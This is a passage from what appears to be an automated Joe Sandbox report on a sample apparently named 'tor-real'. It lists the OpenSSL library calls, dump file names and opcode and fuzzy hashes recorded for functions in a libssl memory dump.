                                                                              • Part of subcall function 6C0A8830: OBJ_nid2sn.LIBCRYPTO-1_1 ref: 6C0A8879
                                                                              • Part of subcall function 6C0A8830: EVP_get_cipherbyname.LIBCRYPTO-1_1 ref: 6C0A8881
                                                                              • Part of subcall function 6C0A8830: OBJ_nid2sn.LIBCRYPTO-1_1 ref: 6C0A88E9
                                                                              • Part of subcall function 6C0A8830: EVP_get_digestbyname.LIBCRYPTO-1_1 ref: 6C0A88F1
                                                                              • Part of subcall function 6C0A8830: EVP_PKEY_asn1_find_str.LIBCRYPTO-1_1 ref: 6C0A896B
                                                                              • Part of subcall function 6C0A8830: EVP_PKEY_asn1_get0_info.LIBCRYPTO-1_1 ref: 6C0A899F
                                                                              • Part of subcall function 6C0A8830: ENGINE_finish.LIBCRYPTO-1_1 ref: 6C0A89B3
                                                                              • Part of subcall function 6C0A8830: EVP_PKEY_asn1_find_str.LIBCRYPTO-1_1 ref: 6C0A89F6
                                                                              • Part of subcall function 6C0A8830: EVP_PKEY_asn1_get0_info.LIBCRYPTO-1_1 ref: 6C0A8A2A
                                                                              • Part of subcall function 6C0A8830: ENGINE_finish.LIBCRYPTO-1_1 ref: 6C0A8A3E
                                                                            • OPENSSL_atexit.LIBCRYPTO-1_1 ref: 6C0ACA5F
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: P_add_cipher$P_add_digest$E_add$E_finishJ_nid2snY_asn1_find_strY_asn1_get0_info$D_run_onceL_atexitP_aes_128_cbcP_aes_128_cbc_hmac_sha1P_aes_128_cbc_hmac_sha256P_aes_128_ccmP_aes_128_gcmP_aes_192_cbcP_aes_256_cbcP_aes_256_cbc_hmac_sha1P_aes_256_cbc_hmac_sha256P_aes_256_ccmP_aes_256_gcmP_aria_128_gcmP_aria_256_gcmP_camellia_128_cbcP_camellia_256_cbcP_chacha20_poly1305P_des_cbcP_des_ede3_cbcP_get_cipherbynameP_get_digestbynameP_idea_cbcP_md5P_md5_sha1P_rc2_40_cbcP_rc2_cbcP_rc4P_rc4_hmac_md5P_seed_cbcP_sha1P_sha224P_sha256P_sha384P_sha512
                                                                            • String ID:
                                                                            • API String ID: 120949582-0
                                                                            • Opcode ID: 8f7ea94addfd550e8e4e054fd34fb3adcb4131ac4892da67b07d1285b5594e94
                                                                            • Instruction ID: 5b9cf30fa931aa4087360f0574e212e94647ed98a16e1e715a55ef8e0b175438
                                                                            • Opcode Fuzzy Hash: 8f7ea94addfd550e8e4e054fd34fb3adcb4131ac4892da67b07d1285b5594e94
                                                                            • Instruction Fuzzy Hash: 6041B27498D6088ECE107FF480453AE7EF0AF4D64EF72481C94825BB51EB79A0D88B63
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: DigestInit_exO_ctrlO_freeX_new
                                                                            • String ID: $A$P
                                                                            • API String ID: 3525689870-3278419925
                                                                            • Opcode ID: 328e64a4cd7b3862ad4d9217b047978002bae15f3deefb093943e24feaf47207
                                                                            • Instruction ID: b27d999b021b470e078b68f357a047babda4d42c918f90f9dacbafad5991ad52
                                                                            • Opcode Fuzzy Hash: 328e64a4cd7b3862ad4d9217b047978002bae15f3deefb093943e24feaf47207
                                                                            • Instruction Fuzzy Hash: 4C12F4B06087459FD340DFA5C48479BBBF0AF88348F51892DE9A98B712D734E849CF92
                                                                            APIs
                                                                            • X509_STORE_CTX_new.LIBCRYPTO-1_1 ref: 6C0A6B4B
                                                                            • X509_STORE_CTX_init.LIBCRYPTO-1_1 ref: 6C0A6B71
                                                                            • X509_STORE_CTX_set_flags.LIBCRYPTO-1_1 ref: 6C0A6B93
                                                                            • X509_verify_cert.LIBCRYPTO-1_1 ref: 6C0A6B9B
                                                                            • X509_STORE_CTX_get1_chain.LIBCRYPTO-1_1 ref: 6C0A6BB1
                                                                            • OPENSSL_sk_shift.LIBCRYPTO-1_1 ref: 6C0A6BBD
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A6BC5
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A6C31
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0A6C50
                                                                            • X509_STORE_CTX_new.LIBCRYPTO-1_1 ref: 6C0A6C73
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A6CAD
                                                                            • X509_STORE_new.LIBCRYPTO-1_1 ref: 6C0A6CD0
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A6D08
                                                                            • X509_STORE_add_cert.LIBCRYPTO-1_1 ref: 6C0A6D1C
                                                                            • X509_STORE_free.LIBCRYPTO-1_1 ref: 6C0A6D3D
                                                                            • X509_STORE_CTX_free.LIBCRYPTO-1_1 ref: 6C0A6D49
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A6D87
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A6DD7
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A6DE7
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A6DF6
                                                                            • X509_get_extension_flags.LIBCRYPTO-1_1 ref: 6C0A6DFE
                                                                            • OPENSSL_sk_pop.LIBCRYPTO-1_1 ref: 6C0A6E13
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A6E1B
                                                                            • X509_STORE_CTX_get1_chain.LIBCRYPTO-1_1 ref: 6C0A6E44
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A6F29
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X509_$L_sk_num$R_put_error$X509_freeX_get1_chainX_new$E_add_certE_freeE_newL_sk_popL_sk_pop_freeL_sk_shiftL_sk_valueX509_get_extension_flagsX509_verify_certX_freeX_initX_set_flags
                                                                            • String ID: A
                                                                            • API String ID: 1984016654-3554254475
                                                                            • Opcode ID: 707f11a59a33e0298fde05373143b88a1303b1aa09eaf9277a232cb95085bb85
                                                                            • Instruction ID: a33d85599e7594db0fcfb0fc8953c764db47411f538b15770819463b89fbedb9
                                                                            • Opcode Fuzzy Hash: 707f11a59a33e0298fde05373143b88a1303b1aa09eaf9277a232cb95085bb85
                                                                            • Instruction Fuzzy Hash: 0BB1E6B15493059FD700AFA9C18435EBBF0BF88348F51892DE9E48BB11D779E9468F82
                                                                            APIs
                                                                              • Part of subcall function 6C0A7170: EVP_PKEY_id.LIBCRYPTO-1_1 ref: 6C0A717A
                                                                            • X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0B870E
                                                                            • EVP_PKEY_copy_parameters.LIBCRYPTO-1_1 ref: 6C0B8722
                                                                            • ERR_clear_error.LIBCRYPTO-1_1 ref: 6C0B8727
                                                                            • X509_check_private_key.LIBCRYPTO-1_1 ref: 6C0B873E
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0B8755
                                                                            • EVP_PKEY_up_ref.LIBCRYPTO-1_1 ref: 6C0B875D
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0B87AA
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B87EF
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B8827
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$R_clear_errorX509_check_private_keyX509_freeX509_get0_pubkeyY_copy_parametersY_freeY_idY_up_ref
                                                                            • String ID: A
                                                                            • API String ID: 3713628426-3554254475
                                                                            • Opcode ID: 55ab9b58d34bdd3c9744bea05f581d8278c102abfcc81632eb55386fbb676ca4
                                                                            • Instruction ID: 7228e8b88f2279c7d7af18dd092b5a2fdfbb8ed8b1e4f6867156548c6afbe0eb
                                                                            • Opcode Fuzzy Hash: 55ab9b58d34bdd3c9744bea05f581d8278c102abfcc81632eb55386fbb676ca4
                                                                            • Instruction Fuzzy Hash: F70206B46093069FD700DF29C084B5ABBF0BF88348F558A2EE494AB760D775E549CF86
                                                                            APIs
                                                                            • COMP_CTX_free.LIBCRYPTO-1_1 ref: 6C0E0A47
                                                                            • COMP_CTX_new.LIBCRYPTO-1_1 ref: 6C0E0A60
                                                                            • EVP_CIPHER_CTX_reset.LIBCRYPTO-1_1 ref: 6C0E0AA5
                                                                            • COMP_CTX_free.LIBCRYPTO-1_1 ref: 6C0E0B44
                                                                            • COMP_CTX_new.LIBCRYPTO-1_1 ref: 6C0E0B5D
                                                                            • EVP_CIPHER_key_length.LIBCRYPTO-1_1 ref: 6C0E0BB2
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 6C0E0BC0
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 6C0E0BD6
                                                                            • memcpy.MSVCRT ref: 6C0E0C46
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 6C0E0C52
                                                                            • EVP_PKEY_new_mac_key.LIBCRYPTO-1_1 ref: 6C0E0C7B
                                                                            • EVP_DigestSignInit.LIBCRYPTO-1_1 ref: 6C0E0CAD
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0E0CBD
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 6C0E0CC9
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 6C0E0CEA
                                                                            • EVP_CipherInit_ex.LIBCRYPTO-1_1 ref: 6C0E0D40
                                                                            • EVP_CIPHER_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E0D68
                                                                            • EVP_CIPHER_CTX_new.LIBCRYPTO-1_1 ref: 6C0E0E60
                                                                            • EVP_CIPHER_CTX_reset.LIBCRYPTO-1_1 ref: 6C0E0E78
                                                                              • Part of subcall function 6C0B5C20: EVP_MD_CTX_free.LIBCRYPTO-1_1(?,?,?,?,6C09FA64), ref: 6C0B5C32
                                                                              • Part of subcall function 6C0B5C20: EVP_MD_CTX_new.LIBCRYPTO-1_1(?,?,?,?,6C09FA64), ref: 6C0B5C3D
                                                                              • Part of subcall function 6C0B5C20: EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0B5C5B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_flags$X_new$X_free$DigestInit_exX_reset$CipherInitR_key_lengthSignX_ctrlY_freeY_new_mac_keymemcpy
                                                                            • String ID: !$A$P$w
                                                                            • API String ID: 1754963063-1903020143
                                                                            • Opcode ID: 94ffb991b0d5296557da4fba86e1ffaf70c0e73a59842126290302e80a244342
                                                                            • Instruction ID: e5706176f53a81fa12c409e3f952630d03a998e278c0947fe037477af516d31f
                                                                            • Opcode Fuzzy Hash: 94ffb991b0d5296557da4fba86e1ffaf70c0e73a59842126290302e80a244342
                                                                            • Instruction Fuzzy Hash: 1E2224B06497458FD700DF28C08475EBBE0BF88318F44896DE9A89B751DB79E948CF82
                                                                            APIs
                                                                            • BIO_s_file.LIBCRYPTO-1_1 ref: 6C0A6596
                                                                            • BIO_new.LIBCRYPTO-1_1 ref: 6C0A659E
                                                                            • OPENSSL_LH_new.LIBCRYPTO-1_1 ref: 6C0A65BC
                                                                            • BIO_ctrl.LIBCRYPTO-1_1 ref: 6C0A65EE
                                                                            • PEM_read_bio_X509.LIBCRYPTO-1_1 ref: 6C0A661B
                                                                            • X509_get_subject_name.LIBCRYPTO-1_1 ref: 6C0A6633
                                                                            • X509_NAME_dup.LIBCRYPTO-1_1 ref: 6C0A6641
                                                                            • OPENSSL_LH_retrieve.LIBCRYPTO-1_1 ref: 6C0A6653
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0A6665
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0A6670
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A66A2
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0A66B3
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0A66C5
                                                                            • BIO_free.LIBCRYPTO-1_1 ref: 6C0A66CD
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A66D9
                                                                            • OPENSSL_LH_free.LIBCRYPTO-1_1 ref: 6C0A66E1
                                                                            • OPENSSL_LH_insert.LIBCRYPTO-1_1 ref: 6C0A6707
                                                                            • OPENSSL_sk_push.LIBCRYPTO-1_1 ref: 6C0A6713
                                                                            • BIO_free.LIBCRYPTO-1_1 ref: 6C0A672B
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A6737
                                                                            • OPENSSL_LH_free.LIBCRYPTO-1_1 ref: 6C0A673F
                                                                            • ERR_clear_error.LIBCRYPTO-1_1 ref: 6C0A6748
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A677B
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0A6785
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X509_$E_freeH_freeO_freeR_put_errorX509_free$E_dupH_insertH_newH_retrieveL_sk_new_nullL_sk_pop_freeL_sk_pushM_read_bio_O_ctrlO_newO_s_fileR_clear_errorX509X509_get_subject_name__stack_chk_fail
                                                                            • String ID: A$l
                                                                            • API String ID: 1862454365-1005974064
                                                                            • Opcode ID: f4e4fe9d28a6e4819348908ca2ce5e539e19c96e7ffb415907855eaf1f590fb4
                                                                            • Instruction ID: 78491f227dd707111a484f0b9f9a67a53e4809b66b65d6a47260de20afe054c9
                                                                            • Opcode Fuzzy Hash: f4e4fe9d28a6e4819348908ca2ce5e539e19c96e7ffb415907855eaf1f590fb4
                                                                            • Instruction Fuzzy Hash: 1C5108B1548705CFD700AFE5C4803AEBFF4AF48358F52882CD5A897B11DB74A54A8B96
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $$Y
                                                                            • API String ID: 0-593117144
                                                                            • Opcode ID: 07f23710b8226a4673707e1b5951e78c2c0419f57616bfbabce0ab7fe8889e90
                                                                            • Instruction ID: deb6b6e44dd816a5e208b72f52391e4fc9000f521a8f1a59a5b4651e685e34ba
                                                                            • Opcode Fuzzy Hash: 07f23710b8226a4673707e1b5951e78c2c0419f57616bfbabce0ab7fe8889e90
                                                                            • Instruction Fuzzy Hash: 3BB126B05087028FD300DF26C58435FBBF5AF89758F148A2EE498AB750E77AE5458F86
                                                                            APIs
                                                                            • BIO_ctrl.LIBCRYPTO-1_1(?,?,?,6C0D5264), ref: 6C0D47C6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_ctrl
                                                                            • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $@$D$P$TLS 1.3, client CertificateVerify$TLS 1.3, server CertificateVerify
                                                                            • API String ID: 3605655398-2524163674
                                                                            • Opcode ID: 3e07d78e24589ac3922963dd1084ba65f81d598869151a986ae440ff7d47e1b1
                                                                            • Instruction ID: 6a09ea10b507810c6e7c2419ac8cdc4c3710d40fe2f46a7307e78d2cae406cee
                                                                            • Opcode Fuzzy Hash: 3e07d78e24589ac3922963dd1084ba65f81d598869151a986ae440ff7d47e1b1
                                                                            • Instruction Fuzzy Hash: C4B1E0B46043009FCB54CF69C4C0B1ABBF2BB99314F558A9EE8989B705D775E845CF82
                                                                            APIs
                                                                              • Part of subcall function 6C0A0DC0: qsort.MSVCRT ref: 6C0A0DE2
                                                                              • Part of subcall function 6C0A0DC0: qsort.MSVCRT ref: 6C0A0E06
                                                                              • Part of subcall function 6C0A0DC0: qsort.MSVCRT ref: 6C0A0E2A
                                                                            • OBJ_nid2sn.LIBCRYPTO-1_1 ref: 6C0A8879
                                                                            • EVP_get_cipherbyname.LIBCRYPTO-1_1 ref: 6C0A8881
                                                                            • OBJ_nid2sn.LIBCRYPTO-1_1 ref: 6C0A88E9
                                                                            • EVP_get_digestbyname.LIBCRYPTO-1_1 ref: 6C0A88F1
                                                                            • EVP_PKEY_asn1_find_str.LIBCRYPTO-1_1 ref: 6C0A896B
                                                                            • EVP_PKEY_asn1_get0_info.LIBCRYPTO-1_1 ref: 6C0A899F
                                                                            • ENGINE_finish.LIBCRYPTO-1_1 ref: 6C0A89B3
                                                                            • EVP_PKEY_asn1_find_str.LIBCRYPTO-1_1 ref: 6C0A89F6
                                                                            • EVP_PKEY_asn1_get0_info.LIBCRYPTO-1_1 ref: 6C0A8A2A
                                                                            • ENGINE_finish.LIBCRYPTO-1_1 ref: 6C0A8A3E
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: qsort$E_finishJ_nid2snY_asn1_find_strY_asn1_get0_info$P_get_cipherbynameP_get_digestbyname
                                                                            • String ID:
                                                                            • API String ID: 3559210586-0
                                                                            • Opcode ID: 93b1045f4269f296233b080b6df282e58710327e6bbf081b706acf95cf1af7b9
                                                                            • Instruction ID: 9aa69f9fffc80b2f770471144f40c80ebf415ac6598a7dcd345489903f0244c2
                                                                            • Opcode Fuzzy Hash: 93b1045f4269f296233b080b6df282e58710327e6bbf081b706acf95cf1af7b9
                                                                            • Instruction Fuzzy Hash: 25A109B06093419FE7009FA5C58434BBBF0BB4A35CF148A1EE4949B691EB75D54ACF82
                                                                            APIs
                                                                            • o2i_SCT_LIST.LIBCRYPTO-1_1 ref: 6C0B60D8
                                                                            • SCT_LIST_free.LIBCRYPTO-1_1 ref: 6C0B60F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: T_freeo2i_
                                                                            • String ID: A
                                                                            • API String ID: 2437383209-3554254475
                                                                            • Opcode ID: 8328dee2cb5b23378bcabcbcc46d39df5972c92f98eb0d76c87a4faad83cf462
                                                                            • Instruction ID: 71c920d7eb7cb90141ee49591a02427586fad46bfe15763099f44ef0392843b5
                                                                            • Opcode Fuzzy Hash: 8328dee2cb5b23378bcabcbcc46d39df5972c92f98eb0d76c87a4faad83cf462
                                                                            • Instruction Fuzzy Hash: 37613BB0608B018FD700EF65C58079FBBE4AF88748F15882DE988DB741EB75E4848F92
                                                                            APIs
                                                                            • EVP_PKEY_CTX_new_id.LIBCRYPTO-1_1 ref: 6C0E06C0
                                                                            • EVP_PKEY_derive_init.LIBCRYPTO-1_1 ref: 6C0E06D2
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E0706
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E073E
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E0772
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E07AA
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E07E2
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E081A
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E084E
                                                                            • EVP_PKEY_derive.LIBCRYPTO-1_1 ref: 6C0E086A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0E08B1
                                                                            • EVP_PKEY_CTX_free.LIBCRYPTO-1_1 ref: 6C0E08B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X_ctrl$R_put_errorX_freeX_new_idY_deriveY_derive_init
                                                                            • String ID: #$&$D$D$P
                                                                            • API String ID: 1049034017-2133515852
                                                                            • Opcode ID: 3b37ad816f32b09440a267c1b2bf236610a8333952a0d540bc313a20d2d16084
                                                                            • Instruction ID: c3d3f4f6bf7c14630dcbb858e56b3d1d6457799c01355a98ca369d834c57d952
                                                                            • Opcode Fuzzy Hash: 3b37ad816f32b09440a267c1b2bf236610a8333952a0d540bc313a20d2d16084
                                                                            • Instruction Fuzzy Hash: DB71E4B15493429FE300DF65D54434BFBE0AB88758F108A2DE5E88B790DBB9D8498F92
                                                                            APIs
                                                                            • d2i_RSAPrivateKey.LIBCRYPTO-1_1 ref: 6C0BA483
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0BA4E9
                                                                              • Part of subcall function 6C0BA1C0: EVP_PKEY_new.LIBCRYPTO-1_1 ref: 6C0BA1CD
                                                                              • Part of subcall function 6C0BA1C0: RSA_up_ref.LIBCRYPTO-1_1 ref: 6C0BA1DF
